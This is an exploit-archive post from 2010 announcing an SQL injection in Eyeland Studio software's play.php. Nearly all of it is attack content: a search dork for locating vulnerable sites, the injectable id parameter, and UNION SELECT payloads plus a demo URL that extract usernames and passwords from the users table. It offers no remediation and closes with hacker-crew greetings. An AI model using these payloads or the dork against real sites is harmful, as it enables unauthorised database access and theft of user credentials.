Eyeland Studio Inc. SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Eyeland Studio Inc. SQL Injection Vulnerability
# Published : 2010-06-13
# Author : Mr.P3rfekT
# Previous Title : UTStats XSS, SQL Injection & Full path disclosure
# Next Title : Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability

Title: Eyeland Studio Inc. SQL Injection Vulnerability
# Version: 2.0
# Author: Mr.P3rfekT
# Software Site:http://www.eyeland.com/
# Tested on Lunix
# CVE : N/A
# Home :www.realmadridsy.com & www.v4-team.com/cc
############### Founded By Mr.P3rfekT ##############


# Dork :"Eyeland Studio Inc. All Rights Reserved."

# Helllo Allz.



# Exploit :

http://[site]/path/play.php?id={SQLi}



#Poc :
union select 1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users


# Poc:

union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users


# Demo:
http:www.site.com/path/play.php?id=-25union select 1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users


./done.


Mail : R4p@hotmail.com

Greeeeeeeeeeeeeetz : Cyb3r-DeViL , V4-team.com/cc Members Except Some Lammerz Cheaters They Know Them Self Muhahaha